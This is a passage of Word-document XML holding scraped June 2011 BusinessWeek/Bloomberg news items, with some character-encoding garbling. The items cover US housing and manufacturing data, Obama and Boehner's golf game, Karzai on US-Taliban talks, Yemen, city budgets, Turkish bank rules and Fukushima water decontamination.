4.91 million, a 13- year low. Nonetheless, they now comprise about 94 percent of the housing market, up from about 85 percent six years ago, as foreclosures and distressed sales lure some buyers.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1.8 million of inventory of distressed homes nationwide would take about three years to sell at the current pace, Daren Blomquist, communications manager at RealtyTrac Inc., said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Competition from existing homes selling at discounted prices is hurting builders. Sales of new properties dropped 4 percent in May to a 310,000 annual pace, economists said ahead of a June 23 report from the Commerce Department. A record-low 323,000 new homes were sold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Manufacturing, which makes up 12 percent of the economy, is struggling to recover from the effects of the earthquake and tsunami in Japan after being one of the bright spots in the recovery that began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Durable Goods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Orders for durable goods, those designed to last at least three years, increased 1.6 percent in May after dropping 3.6 percent the prior month, economists surveyed by Bloomberg said ahead of Commerce Department data June 24. Excluding volatile bookings for transportation gear, orders probably climbed 1 percent after falling 1.6 percent, the survey showed.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Gains in business investment in new equipment and demand from emerging economies like China, Brazil and Mexico are helping bolster factories. American exports in April rose to the highest level on record.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Industrial companies have outperformed homebuilders this year. The Standard &amp; Poor's Industrial Machinery Index has gained 0.9 percent this year, compared with a 6.2 percent decline for the S&amp;P 500 Homebuilding Index.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Expanding Capacity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Caterpillar Inc., the world's largest maker of construction equipment, said last week it would invest an additional $70 million at a hydraulic excavator plant and create about 100 more jobs in Victoria, Texas.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Production at the plant is slated to begin in mid-2012, according to a June 17 statement from the Peoria, Illinois-based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 Chairman Ben S. Bernanke has been among those forecasting that the recent slowdown in growth will prove temporary as commodity prices retreat. At the same time, the central bank should maintain record stimulus to bolster a "frustratingly slow" recovery, he said this month. Officials are scheduled to meet in Washington on June 21-22 to determine the course of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Chris Middleton in Washington. Editors: Carlos Torres, Vince Golle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Timothy R. Homan in Washington at thoman1@bloomberg.net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Christopher Wellisz at cwellisz@bloomberg.net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The Big Business of Synthetic Highs Why Apple Isn't in the Dow God's MBAs: Why Mormon Missions Produce Leaders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The U.S. Postal Service Nears Collapse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God's MBAs: Why Mormon Missions Produce Leaders Kindergarten at 20,000 Feet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Retail Sales U.S. Auto Sales U.S. Competitiveness California's Economy China's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08:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/home-sales-probably-dropped-to-year-s-low-u-s-economy-preview.html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Obama, Boehner Join Forces to Negotiate Fairways, Not Budget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6:05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Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Boehner Challenges Obama on Libya Rationale Amid Б─≤RobustБ─(tm) Debate Biden Says Deficit Talks Seek Signal With $4 Trillion in Savings Biden Focuses on Pensions, Agriculture in Debt-Cut Talks Boehner Says Lawmakers May Seek to Deny Libya Mission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Talev</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President Barack Obama and House Speaker John Boehner made good on their commitment to bipartisan bonding through golf, teaming up today to beat Vice President Joe Biden and Ohio Governor John Kasich on the 18th hole.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and Boehner won $2 each for their victory, according to a statement released by the White House with approval from Boehner's office.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Aides declined to disclose individual scores on the par 72 course at Andrews Air Force Base. The release said only that "the foursome had a great time" and capped it off at the clubhouse with cold drinks on the patio, visiting with service members and watching some televised coverage of the U.S. Open being played in nearby Bethesda, Maryland.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Democratic president, 49, and Boehner, 61, an Ohio Republican, are at odds over plans to raise the nation's $14.3 trillion debt ceiling and whether Obama has the legal authority to continue the U.S. mission in Libya without formal approval from Congress. Aides said the golf game, months in the works, could help the leaders get to know one another better.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other bipartisan pairing of Biden and Kasich at their side, Obama and Boehner teed off at about 10 a.m. The course was kept open for other golfers.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Succession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president and the two leaders next in the line of succession - the vice president and the speaker of the House of Representatives - spending hours together outdoors, an advantage to playing golf at Andrews is that it can be well secured.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Presidential Succession Act dictates that, in the event all three leaders were somehow incapacitated, next in line would be the president pro tempore of the Senate, Daniel K. Inouye, 86, followed by Secretary of State Hillary Clinton, 63.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Reporters were allowed to watch the group putt at the first hole. As they walked off the first hole Obama patted Boehner on the back. The game ended mid-afternoon.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day jobs, Obama wields more power than Boehner. On the course, Boehner had the clout. In its June issue, Golf Digest ranked Boehner the 43rd best golfer in Washington with a 7.9 handicap. That trumps Obama's estimated 17 handicap, putting him 108th on Golf Digest's list.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Kasich's spokesman, Rob Nichols, said the governor is close to an 8 handicap. Golf Digest puts Biden's handicap at 6.3, making him 29th on the list of the capital's 150 best golfers.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Relaxed Style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Terry Holt, a Republican consultant and former Boehner aide, said on the course the House speaker is "very relaxed and easy-going." Holt said Boehner also loves the strategy of the game and enjoys sharing tips on how to make tough putts.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 Jim Clyburn, a South Carolina Democrat who has played rounds with Obama and Boehner, said Obama is a moderate risk-taker on the course, focused if he lands in a sand trap yet relaxed enough to chat off-topic.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their game last summer at Martha's Vineyard, Clyburn said Obama "took the time to get to know more about me. He asked a lot of questions about my parents and growing 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Obama and Boehner's relationship, Clyburn said, "I don't know that one golf match will do it but it's a good beginning."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Budget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golfers weren't expected to talk substantively about policy, the budget talks were in the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 is leading the administration's negotiations with Congress on cutting the deficit and raising the debt ceiling. He finished three days of talks yesterday with a group of lawmakers who are trying to shrink the government's long-term deficit by at least $4 trillion over about a decade. The aim is to reach a an agreement in time for Congress to meet an Aug. 2 deadline for raising the nation's $14.3 trillion debt limit.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 led the House Budget Committee when Republicans took control of the House in 1995 and was a linchpin in negotiations with Democratic President Bill Clinton on cutting spending and the deficit. He won Ohio's governorship last year by defeating a Democratic incumbent in a state that is critical to Obama's 2012 re-election.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Presidents and Golf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Trostel, curator and historian at the USGA Museum in Far Hills, New Jersey, the archive for the sport's ruling body in the U.S., said that since William Howard Taft in 1909 all but three of the men who have been president - Hoover, Truman and Carter - have played golf.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Lyndon B. Johnson used golf to help round up support for the Civil Rights Act in 1964, Trostel said, "it seems like a lot of presidents play the game to get away from the pressures of the office."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other politicians, he said, "it seems like it's the exact opposite reasons, to push through legislation or garner some votes for a bill they're supporting."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Trostel said in the Depression era, the New Deal program of President Franklin D. Roosevelt, an avid golfer until he was struck by polio at age 39, led to the development of more than 300 of the nation's public courses.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Ann Hughey, Christian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Margaret Talev in Washington at mtalev@bloomberg.net.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God's MBAs: Why Mormon Missions Produce Leaders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Water Is the New Texas Liquid Gold When Two Cancer Drugs Are Better Than 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The Big Business of Synthetic Highs Kindergarten at 20,000 Feet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Economic Policy Obama's Healthcare Reform Marketing to Women Publishing Industry Business-to-Business Marketing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02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/obama-boehner-join-forces-to-negotiate-fairways-not-budget.html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Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas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7:02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Obama, Boehner Join Forces to Negotiate Fairways, Not Budget Lugar Gives Obama Б─≤at BestБ─(tm) Mediocre Grade for Foreign Policy QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Pentagon Starts Paring Troops in Afghan War as Drawdown Looms ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates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Eltaf Najafizada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Afghan President Hamid Karzai said the U.S. is holding peace talks with Taliban guerrillas who accept Afghanistan's constitution.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"Peace talks with the Taliban and other countrymen who accept the Afghan constitution, Afghanistan's development, democracy and freedom have started this year, and God willing they are going well," Karzai told a national youth conference in the capital, Kabul, yesterday. "International forces, especially America, are carrying out these talks."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hasn't confirmed the talks and Afghan Taliban spokesman Zabihullah Mujahid has denied that they are taking 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Taliban ruled Afghanistan, harboring the al-Qaeda terrorist network, until they were ousted by a U.S.-led invasion following the Sept. 11 attacks in the U.S. President Barack Obama has said he will announce the first reduction of U.S. troops in Afghanistan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100,000 U.S. soldiers are in Afghanistan, according to the Pentagon and Obama has pledged to fully transfer security duties to the Afghan government by 2014. Concern over the rising American debt has helped increase calls in Congress for the White House to withdraw a substantial number of U.S. troops from the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Karzai's statement was his first to corroborate reports this month by the Washington Post and Associated Press that cited unidentified U.S. and Afghan officials as saying secret U.S. talks were under way with a Taliban official close to the group's leader, Mullah Mohammad Omar.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Renounce Violence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 National Security Council spokeswoman Caitlin Hayden said in an e-mail yesterday that she couldn't "confirm any specific interactions, but we continue to support an Afghan- led reconciliation and reintegration process that would bring insurgents in from the cold provided they meet the Afghan government's long-standing redlines: renounce violence, break with al-Qaeda, and live under the constitution, including respect for the rights of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consistently supported an Afghan-led process of reconciliation," State Department spokesman Mark Toner said in an e-mail yesterday.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>"Currently, we have a broad range of contacts across Afghanistan and the region, and at many levels, to support that effort."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said his government isn't taking part in the talks, and he underscored the essential role of neighboring Pakistan in any peace process. "Getting Pakistan's help in peace talks is very important for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military has backed the Afghan Taliban as a proxy force, according to analysts such as Pakistani author Ahmed Rashid and U.S. officials such as Admiral Mike Mullen, chairman of the Joint Chiefs of Staff. Last week, Karzai met Pakistani leaders to discuss their participation in Afghan peacemaking.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Afghan leader said a High Peace Council that he appointed, which includes former Taliban officials, has opened contacts with the guerrillas.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James Rupert in New Delhi and Margaret Talev and Nicole Gaouette in Washington. Editors: Paul Tighe, Malcolm Scott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Eltaf Najafizada at enajafizada1@bloomberg.net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Mark Silva at msilva34@bloomberg.net;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God's MBAs: Why Mormon Missions Produce Leaders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Water Is the New Texas Liquid Gold When Two Cancer Drugs Are Better Than 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The Big Business of Synthetic Highs Kindergarten at 20,000 Feet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Energy Policy U.S. Retail Sales U.S. Stock Market U.S. Manufacturing U.S. Postal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02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/karzai-says-u-s-holding-talks-with-afghan-taliban-guerrillas.html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Yemeni Clerics Seek Saleh's Removal, Elections in 60 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6:21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QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syria Regime Sends Army Into Northern Town as Residents Flee ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates Says Syrians Flee Second Northern Town as Army Said to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Dodge and Mohammed Hatem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and MET for more on Middle East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19 (Bloomberg) - Yemeni religious clerics called for President Ali Abdullah Saleh's ouster, joining demands from protesters that the embattled leader step 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clerics urged Vice President Abed Rabbo Mansur Hadi to establish a caretaker government to run the country and prepare for presidential elections in 60 days, according to an e-mailed statement yesterday signed by 110 clerics.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said Saleh is unable to perform his job and must step down. Saleh is recuperating in Saudi Arabia after surgery for injuries sustained during a June 3 bombing of a mosque in his presidential compound in Sana'a, the capital. The state-run Saba news agency reported yesterday that Saleh's health is improving and he will return to his country soon.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Elsewhere in the Middle East, the U.K. advised all British nationals to leave Syria immediately amid an unrelenting government crackdown on pro- democracy protesters that has killed more than 1,200 people, according to the Syrian Observatory for Human Rights.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Twenty-five people were killed during protests June 17, Al Arabiya television reported, citing an unidentified Syrian human rights activist.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advice is very clear: Because of the current situation, we advise against all travel to Syria," the Foreign Office in London said in an e- mailed statement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Syrian troops loyal to President Bashar al-Assad yesterday entered the village of Bdama near the Turkish border, arresting residents and setting homes on fire, Al Arabiya television reported.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the Syrian ruler began in mid-March, part of demonstrations across the Middle East and North Africa this year that have unseated the leaders of Egypt and Tunisia, while fighting rages in Syria and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Libya, the country's prime minister called for "new" negotiations between the government and rebel leaders to resolve the conflict, the British Broadcasting Corp. reported yesterday, citing the premier, Baghdadi Mahmudi.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Forces loyal to Muammar Qaddafi fired rockets at the port and center of Misrata June 17, attacking the besieged western city for the first time since government units were pushed out of the urban areas on May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said the Libyan leader is "brutally attacking" his people and using mosques and children's parks as shields for military operations, the Associated Press reported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Western and Arab leaders are demanding an end to Qaddafi's four-decade rule, and NATO aircraft are targeting his forces in a military campaign about to enter its fourth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in an audio message aired on state television June 17, vowed that his forces will defeat the air campaign of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want to negotiate, we are resilient even if they strike with atomic bombs," Qaddafi said. "We will provoke them to use atomic bombs, let them strike with atomic bombs."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yesterday confirmed that an airstrike June 16 hit opposition forces fighting troops loyal to Qaddafi near Brega. The military vehicles, including tanks, were deemed a threat to civilians and were targeted by NATO aircraft, NATO said in a statement on its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regret any possible loss of life or injuries caused by this unfortunate incident," NATO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Alaa Shahine in Dubai, Aida Alami in Cairo, Zaid Sabah Abd Alhamid and Nadeem Hamid in Washington and Caroline Alexander in London. Editors: Ann Hughey, Christian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Dodge in Washington at cdodge1@bloomberg.net.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in Washington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God's MBAs: Why Mormon Missions Produce Leaders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Water Is the New Texas Liquid Gold When Two Cancer Drugs Are Better Than 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The Big Business of Synthetic Highs Kindergarten at 20,000 Feet MBA Pay: The $3.6 Million Degree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Economy and the Election 2012 Presidential Election Day Trading Women in Business Electronic Trading in Asia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2011.06.19 02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/yemeni-clerics-seek-saleh-s-removal-elections-in-60-days.html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Yemeni Clerics Demand Saleh's Ouster, Elections in 60 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3:33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QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syria Regime Sends Army Into Northern Town as Residents Flee ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates Says Syrians Flee Second Northern Town as Army Said to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Dodge and Mohammed Hatem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and MET for more on Middle East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Yemeni religious clerics called for the ouster of President Ali Abdullah Saleh, joining protesters who have been demanding since February that Saleh leave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Yemeni religious clerics have called on Vice President Abed Rabbo Mansur Hadi to establish a caretaker government to run the country and prepare for presidential elections in 60 days, according to an e-mailed statement signed by 110 clerics.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said Saleh is unable to perform his job and must step down. Saleh is recuperating in Saudi Arabia after surgery for injuries sustained during a June 3 bombing of a mosque in his presidential compound in Sana'a, the capital. The state-run Saba news agency reported that Saleh's health is improving and he will return to his country soon.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Elsewhere in the Middle East, the U.K. is advising all British nationals to leave Syria immediately amid an unrelenting government crackdown on pro- democracy protesters that has killed more than 1,200 people, according to the Syrian Observatory for Human Rights.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Twenty-five people were killed during protests yesterday, Al Arabiya television reported, citing an unidentified Syrian human rights activist.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advice is very clear: Because of the current situation, we advise against all travel to Syria," the Foreign Office in London said in an e- mailed statement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against Syrian President Bashar al-Assad's rule began in mid- March, part of demonstrations across the Middle East and North Africa this year that have unseated the leaders of Egypt and Tunisia, while fighting rages in Syria and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Attacks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Libya, forces loyal to Muammar Qaddafi fired rockets at the port and center of Misrata yesterday, attacking the besieged western city for the first time since government units were pushed out of the urban areas on May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Western and Arab leaders are demanding an end to Qaddafi's four-decade rule, and NATO aircraft are targeting his forces in a military campaign about to enter its fourth month. NATO air strikes yesterday attacked targets including anti-aircraft guns, tanks and rocket launchers in Tripoli and near Misrata and Zintan, according to an e-mail from the alliance.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in an audio message aired on state television yesterday, vowed that his forces will defeat the air campaign of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want to negotiate, we are resilient even if they strike with atomic bombs," Qaddafi said. "We will provoke them to use atomic bombs, let them strike with atomic bombs."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Libya's prime minister called for "new" negotiations between the government and rebel leaders to resolve the conflict, the British Broadcasting Corp. reported today, citing the premier, Baghdadi Mahmudi.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North African nation of Morocco, King Mohammed VI gave more power to lawmakers yesterday in a draft constitution drawn up in response to calls for democratic changes and said a referendum will be held on July 1 on the proposal.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Alaa Shahine in Dubai, Aida Alami in Cairo, Zaid Sabah Abd Alhamid and Nadeem Hamid in Washington and Caroline Alexander in London. Editors: Ann Hughey, Christian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Dodge in Washington at cdodge1@bloomberg.net.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in Washington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Water Is the New Texas Liquid Gold From Startup Dreams to a Cubicle Life Summer Reading: Five Management Classics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The Big Business of Synthetic Highs Kindergarten at 20,000 Feet Immigrants Are More Likely to Be Entrepreneurs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Economy and the Election 2012 Presidential Election Day Trading Food Industry Mobile Broadband in Asia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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/yemeni-clerics-demand-saleh-s-ouster-elections-in-60-days.html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Holding Talks With Afghan Taliban, President Karzai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2:19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Lugar Gives Obama Б─≤at BestБ─(tm) Mediocre Grade for Foreign Policy India Said to Resume Military Ties With China After Visa Spat Pentagon Starts Paring Troops in Afghan War as Drawdown Looms ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates Says Boehner Says Lawmakers May Seek to Deny Libya Mission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Eltaf Najafizada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The U.S. is holding peace talks with Afghanistan's Taliban guerrillas, Afghan President Hamid Karzai said in a speech.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"Peace talks with the Taliban and other countrymen who accept the Afghan constitution, Afghanistan's development, democracy and freedom have started this year, and God willing they are going well," Karzai told a national youth conference in the capital, Kabul. "International forces, especially America, are carrying out these talks,"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Karzai's statement was his first to corroborate reports this month by the Washington Post and Associated Press that cited unidentified U.S. and Afghan officials as saying secret U.S. talks were under way with a Taliban official close to the group's leader, Mullah Mohammad Omar.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hasn't confirmed the talks and Afghan Taliban spokesman Zabihullah Mujahid has denied that they are taking place. The Taliban militia ruled Afghanistan, harboring the al- Qaeda terrorist network, until they were ousted by a U.S.-led invasion following the Sept. 11 attacks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 National Security Council spokeswoman Caitlin Hayden said in an e-mail today that she couldn't "confirm any specific interactions, but we continue to support an Afghan-led reconciliation and reintegration process that would bring insurgents in from the cold provided they meet the Afghan government's long-standing redlines: renounce violence, break with al- Qaeda, and live under the constitution, including respect for the rights of women."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Range of Contacts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consistently supported an Afghan-led process of reconciliation," State Department spokesman Mark Toner said in an e-mail today. "Currently, we have a broad range of contacts across Afghanistan and the region, and at many levels, to support that effort."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Karzai said his government isn't taking part in the talks, and he underscored the essential role of neighboring Pakistan in any peace process. "Getting Pakistan's help in peace talks is very important for us,"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Pakistan's military has backed the Afghan Taliban as a proxy force, according to analysts such as Pakistani author Ahmed Rashid and U.S. officials such as Admiral Mike Mullen, chairman of the Joint Chiefs of Staff. Last week, Karzai met Pakistani leaders to discuss their participation in Afghan peacemaking.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Afghan leader said a High Peace Council that he appointed, which includes former Taliban officials, has opened contacts with the guerrillas.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of an Afghan peace process have emerged in recent months as U.S. concern over the rising American debt has helped increase calls in Congress for the White House to withdraw a substantial number of U.S. troops from Afghanistan beginning next month, when President Barack Obama has said he will announce the first reductions. Obama has pledged to fully transfer security duties to the Afghan government by 2014.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James Rupert in New Delhi and Margaret Talev and Nicole Gaouette in Washignton. Editors: Ann Hughey, Christian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Eltaf Najafizada at enajafizada1@bloomberg.net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Water Is the New Texas Liquid Gold From Startup Dreams to a Cubicle Life Bitcoins: Currency of the Geeks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The Big Business of Synthetic Highs Kindergarten at 20,000 Feet Immigrants Are More Likely to Be Entrepreneurs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Energy Policy U.S. Retail Sales U.S. Stock Market U.S. Manufacturing U.S. Postal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22:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/u-s-holding-talks-with-afghan-taliban-president-karzai-says.html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Mayors Find Few Recovery Signs as Cutbacks Pose New Risks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12:33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NJ Transit Says Trains to and From NYC Delayed Up to 45 Minutes WeinerБ─(tm)s Departure Removes Distraction for U.S. House Democrats Weiner Resigning From U.S. House After Admitting Lewd Messages Goldman Adds Barnard College President Debora Spar to Board Weiner of New York Said to Plan to Resign From U.S.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William Selway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Little Rock, Arkansas, has stopped replacing aging police cars. Mesa, Arizona, is losing $5 million a year from thousands of vacant homes that aren't paying utility bills. Providence, Rhode Island, closed schools, fired teachers and may cut almost a fifth of its police force.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with all that, we're still looking at a huge tax increase," said Providence Mayor Angel Taveras, who proposed a $15 million boost in property levies. "Mayors are having to make difficult decisions. They are making them in Boston, New York, Newark, Detroit, all across the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mayors gathered in Baltimore for their annual meeting this weekend say they are being squeezed by rising costs, tax collections below their peak and cuts from states and the federal government that threaten their nascent financial stability. While state governments are showing signs of emerging from the fiscal crisis caused by the recession, cities are still waiting for recovery, the mayors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pieces aren't coming back," said Little Rock Mayor Mark Stodola. "They're not coming back fast at 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Property-tax collection, a key revenue source for cities, dropped during the last three months of 2010 at the fastest pace since housing prices peaked as assessments were lowered, U.S. Census data show. Prices have dropped further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Blow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businesses adding jobs in May at the slowest pace in eight months, an economic slowdown may deal a new blow to sales- and income-tax collections. Local governments have exerted their own drag on the economy, cutting payrolls to where they were in 2006. This month, brokerage MF Global Inc. told clients that local governments are facing their most challenging year in decades, a development that may stoke worries in the municipal bond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conference, which began yesterday, mayors voiced concern that the federal government and the states, seeking to rein in their own budget deficits, will only make cities' struggles worse. For the next fiscal year, 42 states and the District of Columbia have closed, or are working to close, $103 billion in budget gaps, the Washington-based Center on Budget and Policy Priorities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Barack Obama and Congress cut spending this year on community development funding as well as on grants for local fire departments and law enforcement. Philadelphia Mayor Michael Nutter said more cutbacks would only add pressure on the economy at a time when his city is stabilizing.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kinds of cuts negatively impact the economic recovery the president is trying to push forward," he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Passing the Buck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Columbus, Ohio, is bracing for cutbacks by the state, Mayor Michael Coleman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revenues are increasing and the economy is turning around, gradually," he told reporters. "That's the good news. Here's the bad news: State governments continue to pass the buck when it comes to making budget cuts. Rather than making budget cuts at their level, they pass the buck to cities."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Mesa, Arizona, Mayor Scott Smith said he's seen no indication that the fiscal constraints have started to ease. If anything, he said, they are starting to hit the city in unforeseen ways.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city's revenue has slid by about one-fifth from its peak, hit by tumbling sales taxes and a smaller share of revenue from the cash- strapped state. It's also losing about $5 million in revenue because its water utility is losing customers who are forced to leave their homes.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‘Shock' to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didn't anticipate this kind of shock to our utility," he said. "We're just waiting to really be assured we hit bottom. We don't have confidence we've hit that yet."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Mayor Ron Littlefield of Chattanooga, Tennessee, said his city has fared better than most, thanks to investments by companies including Volkswagen AG that have helped create jobs. Even so, he said the city's finances are being aided by a real estate tax increase, which angered some voters so much he faced an effort to recall him.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having done that, we would have been laying off police and firefighters,"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Little Rock, Stodola said he may seek to raise sales taxes. He said the city has used one-time funds to balance its budget, let jobs go unfilled and hasn't replaced a police car in about three years. He said revenue is projected to rise 2 percent this year, though results from the first three months of the year are falling short of expectations.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do not get the city sales tax passed in September, we will be looking at a radically different city," he said. "There will be layoffs, there will be cuts."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Taveras of Providence said he needs to raise real estate taxes because even his budget cuts weren't enough to close the gap he faced.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very kind of slow recovery," he said. "We've got a lot more work to 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State-by-state demographic data: {DEMS &lt;GO&gt;} Archive of most-read muni-bond stories: {TNI MUN READ &lt;GO&gt;} Calendar of fixed-rate municipal sales: {CDRA &lt;GO&gt;} Top Census Stories: {TOP CENS &lt;GO&gt;} State-by-state demographic data: {DEMS &lt;GO&gt;}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Mark Schoifet, Mark Tannenbaum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William Selway in Washington at Wselway@bloomberg.net;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Tannenbaum at mtannen@bloomberg.net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From Startup Dreams to a Cubicle Life Bitcoins: Currency of the Geeks When Two Cancer Drugs Are Better Than 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Kindergarten at 20,000 Feet The Big Business of Synthetic Highs Immigrants Are More Likely to Be Entrepreneurs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 Sales U.S. Competitiveness U.S. Healthcare System U.S. Stock Market U.S. Postal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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/u-s-mayors-find-few-recovery-signs-as-cutbacks-pose-new-risks.html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Turkey Takes New Measures Against Banks to Curb Loan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12:43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Emerging Stocks Fall to 3-Month Low on Greece, Technology Tumble Abraaj Said to Hire Goldman, Merrill to Sell Acibadem Stake Lira Snaps Five-Day Retreat on European Debt Б─≤BreakthroughБ─(tm) Turkey Bonds, Lira May Sink on Greece, Buy Swaps, RBS Says Emerging Stocks Fall on Greece Debt, Credit Tightening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Ali Berat Meric and Mark Bentley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chief regulator interview in third paragraph, JPMorgan in eighth.)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Turkey's banking regulator increased costs for banks that exceed a new limit for consumer lending, the latest in a series of steps designed to slow loan growth and rein in a booming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Banking Regulation and Supervision Agency in Ankara increased the general provisions a bank must pay against consumer loans to 4 percent from 1 percent should its consumer loan portfolio exceed 20 percent of total loans. The decision, published in today's Official Gazette, applies to consumer lending excluding housing and car loans.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lot of banks exceeding the 20 percent limit and they are generally the larger banks," chief regulator Tevfik Bilgin said by telephone.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changes follow central bank increases in the reserves banks must set aside against liabilities such as deposits. Turkey wants to slow loan growth, without increasing interest rates, in order to reduce the size of the current-account deficit and slow the pace of the economic expansion from the 8.9 percent it recorded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"Clearly this means that the Turkish authorities feel that they need to do something and the central bank efforts are really not working fast enough," Tim Ash, head of emerging markets at Royal Bank of Scotland Group Plc, said in a phone interview today. "But this step on its own probably isn't going to be enough."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Fall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Turkey's banking index has dropped 12 percent this year, almost double the rate of decline for the main ISE National 100 index, after the central bank raised reserve requirements on liabilities by 10 percentage points in six months. Foreign lenders including HSBC Holdings Plc and Citigroup Inc. have bought stakes in Turkish banks over the past decade, seeking higher profits in an economy that's grown at more than three times the average in the European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increased an annual 36.5 percent to 610 billion liras ($382 billion) on June 3 compared with 35.6 percent a week previously, the regulator said on June 13. The government and central bank say banks should cut loan growth to an annual 25 percent by the end of the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Lira ‘Pressure'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encouraging to see that the central bank is not alone in its efforts to slow down loan growth," Yarkin Cebeci, economist at JPMorgan Chase &amp; Co. in Istanbul, said in an e- mailed response to questions. "This should ease the pressure on the central bank and on the lira in the short term and should provide more room for the central bank to remain on hold and to stick to its unorthodox policy mix."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lira has declined 3.3 percent against the dollar this year, the biggest decline among major emerging market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regulator today also redefined how it calculates consumer credit risk for the purpose of capital adequacy ratios, assigning a higher risk value to short-term consumer loans and increasing reserves for non-performing loans that exceed 8 percent of the total.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change will penalize banks that offer large amounts of short-term consumer credit and may force some to set aside additional capital to stay above the 12 percent adequacy limit, an official at the regulator said, speaking on condition of anonymity because he's not authorized to speak to the media.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card loans are also included as consumer loans in the new lending limits, the official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Steve Bryant in Ankara. Editors: Phil Serafino, Kim McLaughlin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Ali Berat Meric in Ankara at americ@bloomberg.net Mark Bentley in Istanbul at mbentley3@bloomberg.net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To contact the editor responsible for this story: Riad Hamade at rhamade@bloomberg.net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From Startup Dreams to a Cubicle Life Bitcoins: Currency of the Geeks When Two Cancer Drugs Are Better Than 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How Talbots GrewБ─"and LostБ─"Its Customers Kindergarten at 20,000 Feet The Big Business of Synthetic Highs Immigrants Are More Likely to Be Entrepreneurs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Online Banking Banking Industry Bank for International Settlements Loan Modification Commercial Loans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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/turkey-takes-new-measures-against-banks-to-curb-loan-growth.html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Tepco Halts Water Decontamination as Cesium Absorption Limited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11:17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Failure Guru Probes Nuclear Crisis for Lessons Not Culprits QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Japan Stocks Fall Amid Quake Reconstruction, Greek Debt Woes Toyota Expects Return to Full North America Output in September Food-Safety Fears Grow in Japan on Radiation Test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Kanoko Matsuyama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Tokyo Electric Power Co. halted a water decontamination system today after five hours because a cesium-absorption unit supplied by Kurion Inc. needed replacement sooner than expected.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Electric is investigating the cause and doesn't know when it will be able to restart the system, Junichi Matsumoto, a spokesman for the utility, said at a news conference streamed over the Internet. The decontamination system uses technology from Kurion and France's Areva SA.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as the utility is known, began the decontamination process at 8 p.m. yesterday as a part of its plan to reduce the amount of radiation in about 105 million liters (28 million gallons) of water in basements and trenches at the Fukushima Dai-Ichi nuclear plant. Tepco expects the volume of contaminated water to almost double by the end of the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system was halted at 12:54 a.m. after the level of cesium in the absorption unit reached 4.7 millisieverts of radiation, Matsumoto said. Such units generally need replacement at a level of 4 millisieverts, and the company had expected the unit to last about a month, Matsumoto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Jim McDonald, Richard Dobson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Kanoko Matsuyama in Tokyo at kmatsuyama2@bloomberg.net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From Startup Dreams to a Cubicle Life Bitcoins: Currency of the Geeks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Talbots GrewБ─"and LostБ─"Its Customers The Big Business of Synthetic Highs Yelp's Online Reviewing Mafia Immigrants Are More Likely to Be Entrepreneurs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Global Water Resources Ben Bernanke Sustainable Business Practices Non-Alcoholic Beverage Industry U.S. Auto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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
